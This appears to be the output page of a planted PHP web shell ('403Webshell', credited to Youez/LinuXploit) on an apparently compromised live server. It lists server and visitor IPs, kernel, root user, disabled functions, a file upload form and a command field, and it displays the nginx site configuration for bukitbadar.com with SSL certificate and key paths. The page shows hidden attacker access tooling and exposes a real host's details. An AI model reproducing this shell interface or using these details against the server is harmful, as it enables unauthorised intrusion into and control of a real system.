403Webshell
Server IP : 43.129.54.214  /  Your IP : 216.73.217.113
Web Server : nginx/1.24.0
System : Linux VM-4-108-ubuntu 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /etc/nginx/sites-enabled/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/nginx/sites-enabled/bukitbadar.com
server {
    server_name bukitbadar.com www.bukitbadar.com;

    root /var/www/bukitbadar.com;
    include /etc/nginx/snippets/wp-block-danger-php.conf;
    index index.php index.html;

    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php8.3-fpm.sock;
    }

    location ~ /\.ht {
        deny all;
    }

    listen 443 ssl; # managed by Certbot
    ssl_certificate /etc/letsencrypt/live/bukitbadar.com/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/bukitbadar.com/privkey.pem; # managed by Certbot
    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot


}
server {
    if ($host = www.bukitbadar.com) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    if ($host = bukitbadar.com) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    listen 80;
    server_name bukitbadar.com www.bukitbadar.com;
    return 404; # managed by Certbot




}

Youez - 2016 - github.com/yon3zu
LinuXploit